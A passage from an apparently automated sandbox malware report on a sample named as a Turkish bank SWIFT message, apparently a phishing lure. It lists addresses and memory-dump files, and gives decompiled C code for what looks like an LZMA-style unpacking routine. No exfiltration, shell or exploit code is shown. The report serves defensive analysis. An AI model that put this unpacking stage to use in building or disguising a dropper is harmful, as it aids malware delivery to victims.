                                  0x004065e6
                                  0x004065e8
                                  0x004065eb
                                  0x004065ed
                                  0x004065ef
                                  0x004065f2
                                  0x004065f4
                                  0x004065f7
                                  0x004065fb
                                  0x004065fd
                                  0x004065fd
                                  0x004065fe
                                  0x00406601
                                  0x00406604
                                  0x004065c6
                                  0x004065c6
                                  0x004065ce
                                  0x004065d3
                                  0x004065d5
                                  0x004065d8
                                  0x004065d8
                                  0x00406607
                                  0x0040660e
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00000000
                                  0x00406610
                                  0x00000000
                                  0x00406610
                                  0x0040660e
                                  0x00406521
                                  0x00406524
                                  0x00406526
                                  0x00406529
                                  0x0040652c
                                  0x0040652f
                                  0x00406531
                                  0x00406534
                                  0x00406537
                                  0x00406537
                                  0x0040653a
                                  0x0040653a
                                  0x0040653d
                                  0x00406544
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00000000
                                  0x00406546
                                  0x00000000
                                  0x00406546
                                  0x00406544
                                  0x004064ca
                                  0x004064cd
                                  0x004064cf
                                  0x004064d2
                                  0x00000000
                                  0x00000000
                                  0x00406231
                                  0x00406231
                                  0x00406235
                                  0x0040687a
                                  0x00000000
                                  0x0040687a
                                  0x0040623b
                                  0x0040623e
                                  0x00406241
                                  0x00406244
                                  0x00406247
                                  0x0040624a
                                  0x0040624d
                                  0x0040624f
                                  0x00406252
                                  0x00406255
                                  0x00406258
                                  0x0040625a
                                  0x0040625a
                                  0x0040625a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406639
                                  0x00406639
                                  0x00406639
                                  0x0040663d
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406646
                                  0x00406649
                                  0x0040664c
                                  0x0040664e
                                  0x0040664e
                                  0x0040664e
                                  0x00406651
                                  0x00406654
                                  0x00406657
                                  0x0040665a
                                  0x0040665d
                                  0x00406660
                                  0x00406661
                                  0x00406663
                                  0x00406663
                                  0x00406663
                                  0x00406666
                                  0x00406669
                                  0x0040666c
                                  0x0040666f
                                  0x00406672
                                  0x00406676
                                  0x00406678
                                  0x0040667b
                                  0x00000000
                                  0x0040667d
                                  0x00000000
                                  0x0040667d
                                  0x0040667b
                                  0x004068b0
                                  0x00000000
                                  0x00000000
                                  0x00405edf

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                                  • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                                  • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                                  • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00405E9D(void* __ecx) {
                                  				void* _v8;
                                  				void* _v12;
                                  				signed int _v16;
                                  				unsigned int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				signed int _v64;
                                  				signed int _v68;
                                  				signed int _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				signed int _v84;
                                  				signed int _v88;
                                  				signed int _v92;
                                  				signed int _v95;
                                  				signed int _v96;
                                  				signed int _v100;
                                  				signed int _v104;
                                  				signed int _v108;
                                  				signed int _v112;
                                  				signed int _v116;
                                  				signed int _v120;
                                  				intOrPtr _v124;
                                  				signed int _v128;
                                  				signed int _v132;
                                  				signed int _v136;
                                  				void _v140;
                                  				void* _v148;
                                  				signed int _t537;
                                  				signed int _t538;
                                  				signed int _t572;
                                  
                                  				_t572 = 0x22;
                                  				_v148 = __ecx;
                                  				memcpy( &_v140, __ecx, _t572 << 2);
                                  				if(_v52 == 0xffffffff) {
                                  					return 1;
                                  				}
                                  				while(1) {
                                  					L3:
                                  					_t537 = _v140;
                                  					if(_t537 > 0x1c) {
                                  						break;
                                  					}
                                  					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                                  						case 0:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								goto L173;
                                  							}
                                  							_v112 = _v112 - 1;
                                  							_v116 = _v116 + 1;
                                  							_t537 =  *_v116;
                                  							__eflags = _t537 - 0xe1;
                                  							if(_t537 > 0xe1) {
                                  								goto L174;
                                  							}
                                  							_t542 = _t537 & 0x000000ff;
                                  							_push(0x2d);
                                  							asm("cdq");
                                  							_pop(_t576);
                                  							_push(9);
                                  							_pop(_t577);
                                  							_t622 = _t542 / _t576;
                                  							_t544 = _t542 % _t576 & 0x000000ff;
                                  							asm("cdq");
                                  							_t617 = _t544 % _t577 & 0x000000ff;
                                  							_v64 = _t617;
                                  							_v32 = (1 << _t622) - 1;
                                  							_v28 = (1 << _t544 / _t577) - 1;
                                  							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                  							__eflags = 0x600 - _v124;
                                  							if(0x600 == _v124) {
                                  								L12:
                                  								__eflags = _t625;
                                  								if(_t625 == 0) {
                                  									L14:
                                  									_v76 = _v76 & 0x00000000;
                                  									_v68 = _v68 & 0x00000000;
                                  									goto L17;
                                  								} else {
                                  									goto L13;
                                  								}
                                  								do {
                                  									L13:
                                  									_t625 = _t625 - 1;
                                  									__eflags = _t625;
                                  									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                  								} while (_t625 != 0);
                                  								goto L14;
                                  							}
                                  							__eflags = _v8;
                                  							if(_v8 != 0) {
                                  								GlobalFree(_v8);
                                  							}
                                  							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                  							__eflags = _t537;
                                  							_v8 = _t537;
                                  							if(_t537 == 0) {
                                  								goto L174;
                                  							} else {
                                  								_v124 = 0x600;
                                  								goto L12;
                                  							}
                                  						case 1:
                                  							L15:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 1;
                                  								goto L173;
                                  							}
                                  							_v112 = _v112 - 1;
                                  							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                  							_v116 = _v116 + 1;
                                  							_t50 =  &_v76;
                                  							 *_t50 = _v76 + 1;
                                  							__eflags =  *_t50;
                                  							L17:
                                  							__eflags = _v76 - 4;
                                  							if(_v76 < 4) {
                                  								goto L15;
                                  							}
                                  							_t550 = _v68;
                                  							__eflags = _t550 - _v120;
                                  							if(_t550 == _v120) {
                                  								L22:
                                  								_v76 = 5;
                                  								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                  								goto L25;
                                  							}
                                  							__eflags = _v12;
                                  							_v120 = _t550;
                                  							if(_v12 != 0) {
                                  								GlobalFree(_v12);
                                  							}
                                  							_t537 = GlobalAlloc(0x40, _v68); // executed
                                  							__eflags = _t537;
                                  							_v12 = _t537;
                                  							if(_t537 == 0) {
                                  								goto L174;
                                  							} else {
                                  								goto L22;
                                  							}
                                  						case 2:
                                  							L26:
                                  							_t557 = _v100 & _v32;
                                  							_v136 = 6;
                                  							_v80 = _t557;
                                  							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                  							goto L135;
                                  						case 3:
                                  							L23:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 3;
                                  								goto L173;
                                  							}
                                  							_v112 = _v112 - 1;
                                  							_t72 =  &_v116;
                                  							 *_t72 = _v116 + 1;
                                  							__eflags =  *_t72;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L25:
                                  							_v76 = _v76 - 1;
                                  							__eflags = _v76;
                                  							if(_v76 != 0) {
                                  								goto L23;
                                  							}
                                  							goto L26;
                                  						case 4:
                                  							L136:
                                  							_t559 =  *_t626;
                                  							_t610 = _t559 & 0x0000ffff;
                                  							_t591 = (_v20 >> 0xb) * _t610;
                                  							__eflags = _v16 - _t591;
                                  							if(_v16 >= _t591) {
                                  								_v20 = _v20 - _t591;
                                  								_v16 = _v16 - _t591;
                                  								_v68 = 1;
                                  								_t560 = _t559 - (_t559 >> 5);
                                  								__eflags = _t560;
                                  								 *_t626 = _t560;
                                  							} else {
                                  								_v20 = _t591;
                                  								_v68 = _v68 & 0x00000000;
                                  								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                  							}
                                  							__eflags = _v20 - 0x1000000;
                                  							if(_v20 >= 0x1000000) {
                                  								goto L142;
                                  							} else {
                                  								goto L140;
                                  							}
                                  						case 5:
                                  							L140:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 5;
                                  								goto L173;
                                  							}
                                  							_v20 = _v20 << 8;
                                  							_v112 = _v112 - 1;
                                  							_t464 =  &_v116;
                                  							 *_t464 = _v116 + 1;
                                  							__eflags =  *_t464;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L142:
                                  							_t561 = _v136;
                                  							goto L143;
                                  						case 6:
                                  							__edx = 0;
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__eax = _v8;
                                  								__ecx = _v60;
                                  								_v56 = 1;
                                  								_v136 = 7;
                                  								__esi = _v8 + 0x180 + _v60 * 2;
                                  								goto L135;
                                  							}
                                  							__eax = _v96 & 0x000000ff;
                                  							__esi = _v100;
                                  							__cl = 8;
                                  							__cl = 8 - _v64;
                                  							__esi = _v100 & _v28;
                                  							__eax = (_v96 & 0x000000ff) >> 8;
                                  							__ecx = _v64;
                                  							__esi = (_v100 & _v28) << 8;
                                  							__ecx = _v8;
                                  							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                  							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                  							__eflags = _v60 - 4;
                                  							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                  							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                  							if(_v60 >= 4) {
                                  								__eflags = _v60 - 0xa;
                                  								if(_v60 >= 0xa) {
                                  									_t103 =  &_v60;
                                  									 *_t103 = _v60 - 6;
                                  									__eflags =  *_t103;
                                  								} else {
                                  									_v60 = _v60 - 3;
                                  								}
                                  							} else {
                                  								_v60 = 0;
                                  							}
                                  							__eflags = _v56 - __edx;
                                  							if(_v56 == __edx) {
                                  								__ebx = 0;
                                  								__ebx = 1;
                                  								goto L63;
                                  							}
                                  							__eax = _v24;
                                  							__eax = _v24 - _v48;
                                  							__eflags = __eax - _v120;
                                  							if(__eax >= _v120) {
                                  								__eax = __eax + _v120;
                                  								__eflags = __eax;
                                  							}
                                  							__ecx = _v12;
                                  							__ebx = 0;
                                  							__ebx = 1;
                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                  							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                  							goto L43;
                                  						case 7:
                                  							__eflags = _v68 - 1;
                                  							if(_v68 != 1) {
                                  								__eax = _v40;
                                  								_v132 = 0x16;
                                  								_v36 = _v40;
                                  								__eax = _v44;
                                  								_v40 = _v44;
                                  								__eax = _v48;
                                  								_v44 = _v48;
                                  								__eax = 0;
                                  								__eflags = _v60 - 7;
                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  								__al = __al & 0x000000fd;
                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                  								_v60 = (__eflags >= 0) - 1 + 0xa;
                                  								__eax = _v8;
                                  								__eax = _v8 + 0x664;
                                  								__eflags = __eax;
                                  								_v92 = __eax;
                                  								goto L71;
                                  							}
                                  							__eax = _v8;
                                  							__ecx = _v60;
                                  							_v136 = 8;
                                  							__esi = _v8 + 0x198 + _v60 * 2;
                                  							goto L135;
                                  						case 8:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__eax = _v8;
                                  								__ecx = _v60;
                                  								_v136 = 0xa;
                                  								__esi = _v8 + 0x1b0 + _v60 * 2;
                                  							} else {
                                  								__eax = _v60;
                                  								__ecx = _v8;
                                  								__eax = _v60 + 0xf;
                                  								_v136 = 9;
                                  								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                  								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                  							}
                                  							goto L135;
                                  						case 9:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								goto L92;
                                  							}
                                  							__eflags = _v100;
                                  							if(_v100 == 0) {
                                  								goto L174;
                                  							}
                                  							__eax = 0;
                                  							__eflags = _v60 - 7;
                                  							_t264 = _v60 - 7 >= 0;
                                  							__eflags = _t264;
                                  							0 | _t264 = _t264 + _t264 + 9;
                                  							_v60 = _t264 + _t264 + 9;
                                  							goto L78;
                                  						case 0xa:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__eax = _v8;
                                  								__ecx = _v60;
                                  								_v136 = 0xb;
                                  								__esi = _v8 + 0x1c8 + _v60 * 2;
                                  								goto L135;
                                  							}
                                  							__eax = _v44;
                                  							goto L91;
                                  						case 0xb:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__ecx = _v40;
                                  								__eax = _v36;
                                  								_v36 = _v40;
                                  							} else {
                                  								__eax = _v40;
                                  							}
                                  							__ecx = _v44;
                                  							_v40 = _v44;
                                  							L91:
                                  							__ecx = _v48;
                                  							_v48 = __eax;
                                  							_v44 = _v48;
                                  							L92:
                                  							__eax = _v8;
                                  							_v132 = 0x15;
                                  							__eax = _v8 + 0xa68;
                                  							_v92 = _v8 + 0xa68;
                                  							goto L71;
                                  						case 0xc:
                                  							L102:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0xc;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t340 =  &_v116;
                                  							 *_t340 = _v116 + 1;
                                  							__eflags =  *_t340;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							__eax = _v48;
                                  							goto L104;
                                  						case 0xd:
                                  							L39:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0xd;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t127 =  &_v116;
                                  							 *_t127 = _v116 + 1;
                                  							__eflags =  *_t127;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L41:
                                  							__eax = _v68;
                                  							__eflags = _v76 - _v68;
                                  							if(_v76 != _v68) {
                                  								goto L50;
                                  							}
                                  							__eflags = __ebx - 0x100;
                                  							if(__ebx >= 0x100) {
                                  								goto L56;
                                  							}
                                  							L43:
                                  							__eax = _v95 & 0x000000ff;
                                  							_v95 = _v95 << 1;
                                  							__ecx = _v92;
                                  							__eax = (_v95 & 0x000000ff) >> 7;
                                  							_v76 = __eax;
                                  							__eax = __eax + 1;
                                  							__eax = __eax << 8;
                                  							__eax = __eax + __ebx;
                                  							__esi = _v92 + __eax * 2;
                                  							_v20 = _v20 >> 0xb;
                                  							__ax =  *__esi;
                                  							_v88 = __esi;
                                  							__edx = __ax & 0x0000ffff;
                                  							__ecx = (_v20 >> 0xb) * __edx;
                                  							__eflags = _v16 - __ecx;
                                  							if(_v16 >= __ecx) {
                                  								_v20 = _v20 - __ecx;
                                  								_v16 = _v16 - __ecx;
                                  								__cx = __ax;
                                  								_v68 = 1;
                                  								__cx = __ax >> 5;
                                  								__eflags = __eax;
                                  								__ebx = __ebx + __ebx + 1;
                                  								 *__esi = __ax;
                                  							} else {
                                  								_v68 = _v68 & 0x00000000;
                                  								_v20 = __ecx;
                                  								0x800 = 0x800 - __edx;
                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags = _v20 - 0x1000000;
                                  							_v72 = __ebx;
                                  							if(_v20 >= 0x1000000) {
                                  								goto L41;
                                  							} else {
                                  								goto L39;
                                  							}
                                  						case 0xe:
                                  							L48:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0xe;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t161 =  &_v116;
                                  							 *_t161 = _v116 + 1;
                                  							__eflags =  *_t161;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							while(1) {
                                  								L50:
                                  								__eflags = __ebx - 0x100;
                                  								if(__ebx >= 0x100) {
                                  									break;
                                  								}
                                  								__eax = _v92;
                                  								__edx = __ebx + __ebx;
                                  								__ecx = _v20;
                                  								__esi = __edx + __eax;
                                  								__ecx = _v20 >> 0xb;
                                  								__ax =  *__esi;
                                  								_v88 = __esi;
                                  								__edi = __ax & 0x0000ffff;
                                  								__ecx = (_v20 >> 0xb) * __edi;
                                  								__eflags = _v16 - __ecx;
                                  								if(_v16 >= __ecx) {
                                  									_v20 = _v20 - __ecx;
                                  									_v16 = _v16 - __ecx;
                                  									__cx = __ax;
                                  									_t175 = __edx + 1; // 0x1
                                  									__ebx = _t175;
                                  									__cx = __ax >> 5;
                                  									__eflags = __eax;
                                  									 *__esi = __ax;
                                  								} else {
                                  									_v20 = __ecx;
                                  									0x800 = 0x800 - __edi;
                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  									__ebx = __ebx + __ebx;
                                  									 *__esi = __cx;
                                  								}
                                  								__eflags = _v20 - 0x1000000;
                                  								_v72 = __ebx;
                                  								if(_v20 >= 0x1000000) {
                                  									continue;
                                  								} else {
                                  									goto L48;
                                  								}
                                  							}
                                  							L56:
                                  							_t178 =  &_v56;
                                  							 *_t178 = _v56 & 0x00000000;
                                  							__eflags =  *_t178;
                                  							goto L57;
                                  						case 0xf:
                                  							L60:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0xf;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t208 =  &_v116;
                                  							 *_t208 = _v116 + 1;
                                  							__eflags =  *_t208;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L62:
                                  							__eflags = __ebx - 0x100;
                                  							if(__ebx >= 0x100) {
                                  								L57:
                                  								__al = _v72;
                                  								_v96 = _v72;
                                  								goto L58;
                                  							}
                                  							L63:
                                  							__eax = _v92;
                                  							__edx = __ebx + __ebx;
                                  							__ecx = _v20;
                                  							__esi = __edx + __eax;
                                  							__ecx = _v20 >> 0xb;
                                  							__ax =  *__esi;
                                  							_v88 = __esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = (_v20 >> 0xb) * __edi;
                                  							__eflags = _v16 - __ecx;
                                  							if(_v16 >= __ecx) {
                                  								_v20 = _v20 - __ecx;
                                  								_v16 = _v16 - __ecx;
                                  								__cx = __ax;
                                  								_t222 = __edx + 1; // 0x1
                                  								__ebx = _t222;
                                  								__cx = __ax >> 5;
                                  								__eflags = __eax;
                                  								 *__esi = __ax;
                                  							} else {
                                  								_v20 = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags = _v20 - 0x1000000;
                                  							_v72 = __ebx;
                                  							if(_v20 >= 0x1000000) {
                                  								goto L62;
                                  							} else {
                                  								goto L60;
                                  							}
                                  						case 0x10:
                                  							L112:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0x10;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t371 =  &_v116;
                                  							 *_t371 = _v116 + 1;
                                  							__eflags =  *_t371;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							goto L114;
                                  						case 0x11:
                                  							L71:
                                  							__esi = _v92;
                                  							_v136 = 0x12;
                                  							goto L135;
                                  						case 0x12:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__eax = _v92;
                                  								_v136 = 0x13;
                                  								__esi = _v92 + 2;
                                  								L135:
                                  								_v88 = _t626;
                                  								goto L136;
                                  							}
                                  							__eax = _v80;
                                  							_v52 = _v52 & 0x00000000;
                                  							__ecx = _v92;
                                  							__eax = _v80 << 4;
                                  							__eflags = __eax;
                                  							__eax = _v92 + __eax + 4;
                                  							goto L133;
                                  						case 0x13:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								_t475 =  &_v92;
                                  								 *_t475 = _v92 + 0x204;
                                  								__eflags =  *_t475;
                                  								_v52 = 0x10;
                                  								_v68 = 8;
                                  								L147:
                                  								_v128 = 0x14;
                                  								goto L148;
                                  							}
                                  							__eax = _v80;
                                  							__ecx = _v92;
                                  							__eax = _v80 << 4;
                                  							_v52 = 8;
                                  							__eax = _v92 + (_v80 << 4) + 0x104;
                                  							L133:
                                  							_v92 = __eax;
                                  							_v68 = 3;
                                  							goto L147;
                                  						case 0x14:
                                  							_v52 = _v52 + __ebx;
                                  							__eax = _v132;
                                  							goto L143;
                                  						case 0x15:
                                  							__eax = 0;
                                  							__eflags = _v60 - 7;
                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  							__al = __al & 0x000000fd;
                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                  							_v60 = (__eflags >= 0) - 1 + 0xb;
                                  							goto L123;
                                  						case 0x16:
                                  							__eax = _v52;
                                  							__eflags = __eax - 4;
                                  							if(__eax >= 4) {
                                  								_push(3);
                                  								_pop(__eax);
                                  							}
                                  							__ecx = _v8;
                                  							_v68 = 6;
                                  							__eax = __eax << 7;
                                  							_v128 = 0x19;
                                  							_v92 = __eax;
                                  							goto L148;
                                  						case 0x17:
                                  							L148:
                                  							__eax = _v68;
                                  							_v84 = 1;
                                  							_v76 = _v68;
                                  							goto L152;
                                  						case 0x18:
                                  							L149:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0x18;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t490 =  &_v116;
                                  							 *_t490 = _v116 + 1;
                                  							__eflags =  *_t490;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L151:
                                  							_t493 =  &_v76;
                                  							 *_t493 = _v76 - 1;
                                  							__eflags =  *_t493;
                                  							L152:
                                  							__eflags = _v76;
                                  							if(_v76 <= 0) {
                                  								__ecx = _v68;
                                  								__ebx = _v84;
                                  								0 = 1;
                                  								__eax = 1 << __cl;
                                  								__ebx = _v84 - (1 << __cl);
                                  								__eax = _v128;
                                  								_v72 = __ebx;
                                  								L143:
                                  								_v140 = _t561;
                                  								goto L3;
                                  							}
                                  							__eax = _v84;
                                  							_v20 = _v20 >> 0xb;
                                  							__edx = _v84 + _v84;
                                  							__eax = _v92;
                                  							__esi = __edx + __eax;
                                  							_v88 = __esi;
                                  							__ax =  *__esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = (_v20 >> 0xb) * __edi;
                                  							__eflags = _v16 - __ecx;
                                  							if(_v16 >= __ecx) {
                                  								_v20 = _v20 - __ecx;
                                  								_v16 = _v16 - __ecx;
                                  								__cx = __ax;
                                  								__cx = __ax >> 5;
                                  								__eax = __eax - __ecx;
                                  								__edx = __edx + 1;
                                  								__eflags = __edx;
                                  								 *__esi = __ax;
                                  								_v84 = __edx;
                                  							} else {
                                  								_v20 = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								_v84 = _v84 << 1;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags = _v20 - 0x1000000;
                                  							if(_v20 >= 0x1000000) {
                                  								goto L151;
                                  							} else {
                                  								goto L149;
                                  							}
                                  						case 0x19:
                                  							__eflags = __ebx - 4;
                                  							if(__ebx < 4) {
                                  								_v48 = __ebx;
                                  								L122:
                                  								_t399 =  &_v48;
                                  								 *_t399 = _v48 + 1;
                                  								__eflags =  *_t399;
                                  								L123:
                                  								__eax = _v48;
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									_v52 = _v52 | 0xffffffff;
                                  									goto L173;
                                  								}
                                  								__eflags = __eax - _v100;
                                  								if(__eax > _v100) {
                                  									goto L174;
                                  								}
                                  								_v52 = _v52 + 2;
                                  								__eax = _v52;
                                  								_t406 =  &_v100;
                                  								 *_t406 = _v100 + _v52;
                                  								__eflags =  *_t406;
                                  								goto L126;
                                  							}
                                  							__ecx = __ebx;
                                  							__eax = __ebx;
                                  							__ecx = __ebx >> 1;
                                  							__eax = __ebx & 0x00000001;
                                  							__ecx = (__ebx >> 1) - 1;
                                  							__al = __al | 0x00000002;
                                  							__eax = (__ebx & 0x00000001) << __cl;
                                  							__eflags = __ebx - 0xe;
                                  							_v48 = __eax;
                                  							if(__ebx >= 0xe) {
                                  								__ebx = 0;
                                  								_v76 = __ecx;
                                  								L105:
                                  								__eflags = _v76;
                                  								if(_v76 <= 0) {
                                  									__eax = __eax + __ebx;
                                  									_v68 = 4;
                                  									_v48 = __eax;
                                  									__eax = _v8;
                                  									__eax = _v8 + 0x644;
                                  									__eflags = __eax;
                                  									L111:
                                  									__ebx = 0;
                                  									_v92 = __eax;
                                  									_v84 = 1;
                                  									_v72 = 0;
                                  									_v76 = 0;
                                  									L115:
                                  									__eax = _v68;
                                  									__eflags = _v76 - _v68;
                                  									if(_v76 >= _v68) {
                                  										_t397 =  &_v48;
                                  										 *_t397 = _v48 + __ebx;
                                  										__eflags =  *_t397;
                                  										goto L122;
                                  									}
                                  									__eax = _v84;
                                  									_v20 = _v20 >> 0xb;
                                  									__edi = _v84 + _v84;
                                  									__eax = _v92;
                                  									__esi = __edi + __eax;
                                  									_v88 = __esi;
                                  									__ax =  *__esi;
                                  									__ecx = __ax & 0x0000ffff;
                                  									__edx = (_v20 >> 0xb) * __ecx;
                                  									__eflags = _v16 - __edx;
                                  									if(_v16 >= __edx) {
                                  										__ecx = 0;
                                  										_v20 = _v20 - __edx;
                                  										__ecx = 1;
                                  										_v16 = _v16 - __edx;
                                  										__ebx = 1;
                                  										__ecx = _v76;
                                  										__ebx = 1 << __cl;
                                  										__ecx = 1 << __cl;
                                  										__ebx = _v72;
                                  										__ebx = _v72 | __ecx;
                                  										__cx = __ax;
                                  										__cx = __ax >> 5;
                                  										__eax = __eax - __ecx;
                                  										__edi = __edi + 1;
                                  										__eflags = __edi;
                                  										_v72 = __ebx;
                                  										 *__esi = __ax;
                                  										_v84 = __edi;
                                  									} else {
                                  										_v20 = __edx;
                                  										0x800 = 0x800 - __ecx;
                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  										_v84 = _v84 << 1;
                                  										 *__esi = __dx;
                                  									}
                                  									__eflags = _v20 - 0x1000000;
                                  									if(_v20 >= 0x1000000) {
                                  										L114:
